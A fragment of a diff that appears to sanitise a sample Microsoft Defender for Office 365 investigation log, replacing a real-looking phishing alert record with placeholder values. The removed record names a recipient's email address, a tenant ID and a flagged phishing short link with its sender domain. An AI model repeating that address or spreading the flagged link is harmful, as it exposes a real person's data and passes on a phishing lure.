mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:780880f2766afe9e0a18e7c6fa676ee2\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\",\\\"InvestigationStatus\\\":\\\"Pending\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"275ae857-f201-4a2e-8f43-d48391c56871\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fa76572799-59c1-0221-8c00-08dccafd4a30\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Recipient\\\":\\\"ggravier@ixina.com\\\",\\\"Urls\\\":[\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"https://zupimages.net/up/24/35/1itk.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P1Sender\\\":\\\"okhmqyjdcdn.bfwmwyytludfovodgfouzyeg@wdezd.ersdz.meradebo.com\\\",\\\"P1SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"SenderIP\\\":\\\"40.107.244.101\\\",\\\"P2Sender\\\":\\\"support.33@wdezd.ersdz.meradebo.com\\\",\\\"P2SenderDisplayName\\\":\\\"Tractor Supply\\\",\\\"P2SenderDomain\\\":\\\"wdezd.ersdz.meradebo.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"InternetMessageId\\\":\\\"<t8x4f5wr3iqw6v62mv5c8gyb9p2v7b91.88246820.v0o2qn@0u8putyigk5lk58rp6upohpkyzd5.namprd3666.prod.outlook.com>\\\",\\\"Subject\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:98fed74e812bdb3dd6241259c9afe88d\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"4\\\",\\\"MailboxPrimaryAddress\\\":\\\"ggravier@ixina.com\\\",\\\"Upn\\\":\\\"ggravier@ixina.com\\\",\\\"AadId\\\":\\\"3339ab32-9c9a-4dab-a67b-d9316a37b2d3\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:9b5a6776b9acaade0704a7a3ed836036\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"5\\\",\\\"Url\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":12,\\\"Urn\\\":\\\"urn:UrlEntity:0436a04039e1a1bd9af706cbef1a6b7a\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"},{\\\"$id\\\":\\\"6\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (SenderIp:\\\\\\\"40.107.244.101\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;40.107.244.101;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:88f2ce520265ef415e7f63e840feec95\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"7\\\",\\\"NetworkMessageIds\\\":[\\\"41e9cae8-deaa-4d89-6036-08dccaf8db1a\\\",\\\"2019a522-c814-4cd0-b23d-08dccaf8cc37\\\",\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"02c4a467-76c0-4491-737f-08dccaf8d47c\\\",\\\"26c865c1-2187-469c-5c0c-08dccaf8dca1\\\",\\\"c4ccc77c-0004-4c60-5f7d-08dccaf8d5b1\\\",\\\"5f3c47d0-051b-4439-8235-08dccaf8d27a\\\",\\\"1035a7d2-723e-4e0b-9b50-08dccaf8cf41\\\",\\\"1a8a159c-6655-45c4-8eef-08dccaf8d0e7\\\",\\\"1106f7ec-3c1f-45f6-2640-08dccaf90045\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://zpr.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://zpr.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://zpr.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:b2738e6d2385fbb888114d4d12dbb665\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":1,\\\"Malware\\\":0,\\\"Spam\\\":1},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"wdezd.ersdz.meradebo.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"ee73bbc9-c170-438a-82eb-08dccaf8fa4f\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.8007877Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"\ud835\ude7c\ud835\ude92\ud835\ude95\ud835\udea0\ud835\ude8a\ud835\ude9e\ud835\ude94\ud835\ude8e\ud835\ude8e \ud835\ude72\ud835\ude98\ud835\ude9b\ud835\ude8d\ud835\ude95\ud835\ude8e\ud835\ude9c\ud835\ude9c \ud835\ude7f\ud835\ude98\ud835\udea0\ud835\ude8e\ud835\ude9b \ud835\ude83\ud835\ude98\ud835\ude98\ud835\ude95 \ud835\ude82\ud835\ude8e\ud835\ude9d \ud835\ude86\ud835\ude92\ud835\ude97\ud835\ude97\ud835\ude8e\ud835\ude9b;wdezd.ersdz.meradebo.com;1;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:7350e5b982beaa3846d327a005dd57d6\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"AM7EUR03BG406\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"EndTimeUtc\":\"2024-09-02T03:33:31\",\"InvestigationId\":\"urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:c85d59e9ff9d6393504a822ac49176c8\",\"InvestigationType\":\"ZappedUrlInvestigation\",\"LastUpdateTimeUtc\":\"2024-09-02T03:28:24\",\"RunningTime\":771,\"StartTimeUtc\":\"2024-09-02T03:20:40\",\"Status\":\"Pending Action\"}",
+    "message": "{\"CreationTime\":\"2024-09-02T03:33:37\",\"Id\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"Operation\":\"AirInvestigationData\",\"OrganizationId\":\"123abc456-d789-0e1f-2a34-b56789c01234\",\"RecordType\":64,\"UserKey\":\"AirInvestigation\",\"UserType\":4,\"Version\":1,\"Workload\":\"AirInvestigation\",\"ObjectId\":\"1234ab56-7890-1234-c5de-678fabcd9012\",\"UserId\":\"AirInvestigation\",\"Actions\":[\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:12345a6789bc01de23456f789ab0\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"Recipient\\\":\\\"user@mailbox.com\\\",\\\"Urls\\\":[\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"https://website.net/up/24/35/image.png\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"NormalPhish\\\"],\\\"Sender\\\":\\\"sender@test.integration.com\\\",\\\"P1Sender\\\":\\\"p1sender@test.integration.com\\\",\\\"P1SenderDomain\\\":\\\"test.integration.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"sender@test.integration.com\\\",\\\"P2SenderDisplayName\\\":\\\"P2 name\\\",\\\"P2SenderDomain\\\":\\\"test.integration.com\\\",\\\"ReceivedDate\\\":\\\"2024-09-02T02:43:12\\\",\\\"NetworkMessageId\\\":\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"InternetMessageId\\\":\\\"<message.id.test@0123456789.userabc.mail.com>\\\",\\\"Subject\\\":\\\"Subject of the mail\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"DeliveredAsSpam\\\",\\\"ThreatDetectionMethods\\\":[\\\"FingerPrintMatch\\\"],\\\"Language\\\":\\\"en\\\",\\\"DeliveryLocation\\\":\\\"JunkFolder\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"None\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Best guess pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:01abc23d456efa7bc8901234d5efa67b\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:20:40\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\",\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:012345a6789bcd0e1f23a4b5cd678ef9\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"01a2bcd3-efab-4c56-7890-12defa3bc4d\\\",\\\"0123a456-b789-0cd1-e23f-45abcd6ef78\\\",\\\"ab12cde3-f456-789a-01bc-23defa4bc5d\\\",\\\"01a2b345-67c8-9012-345d-67efabc8d90e\\\",\\\"01a234b5-6789-012c-3d4e-56fabcd7ef8\\\",\\\"a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6\\\",\\\"0a1b23c4-567d-8901-2345-67efabc8d90a\\\",\\\"0123a4b5-678c-9d0e-1f23-45abcde6fa78\\\",\\\"0a1b234c-5678-90d1-2efa-34bcdef5a6b7\\\",\\\"0123a4bc-5d6e-78f9-0123-45abcde67890\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":0,\\\"Phish\\\":6,\\\"Malware\\\":0,\\\"Spam\\\":6,\\\"MaliciousUrl\\\":12},\\\"CountByProtectionStatus\\\":{\\\"DeliveredAsSpam\\\":6,\\\"Delivered\\\":4,\\\"Blocked\\\":2},\\\"CountByDeliveryLocation\\\":{\\\"JunkFolder\\\":6,\\\"External\\\":3,\\\"Failed\\\":2,\\\"Forwarded\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://test.io/TUZAu6VrAvQT\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"MailCount\\\":12,\\\"IsVolumeAnamoly\\\":true,\\\"ClusterSourceIdentifier\\\":\\\"https://test.io/TUZAu6VrAvQT\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-08-13T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-09-02T03:24:59.7851632Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://test.io/TUZAu6VrAvQT;1\\\",\\\"QueryStartTime\\\":\\\"8/13/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"9/2/2024 3:24:59 AM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a0123b4c5678def901234a5b67cde890\\\",\\\"Source\\\":\\\"OATP\\\",\\\"FirstSeen\\\":\\\"2024-09-02T03:25:01\\\"}],\\\"RelatedAlertIds\\\":[\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\"],\\\"StartTimeUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"TimestampUtc\\\":\\\"2024-09-02T03:27:33\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"123abc456-d789-0e1f-2a34-b56789c01234\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"MachineName\\\":\\\"MACHINE01\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"],\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"EndTimeUtc\\\":\\\"2024-09-02T03:14:37.3349438Z\\\",\\\"TimeGenerated\\\":\\\"2024-09-02T03:16:43.91Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-09-02T03:33:31.8137435Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"URLList\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"01234567-89a0-1234-5b67-89cdefa0b12\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"8a5bf71a-d9e4-422e-8bdb-33272de66983\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:a01b23c4de5f678901a234bc5678d9\\\",\\\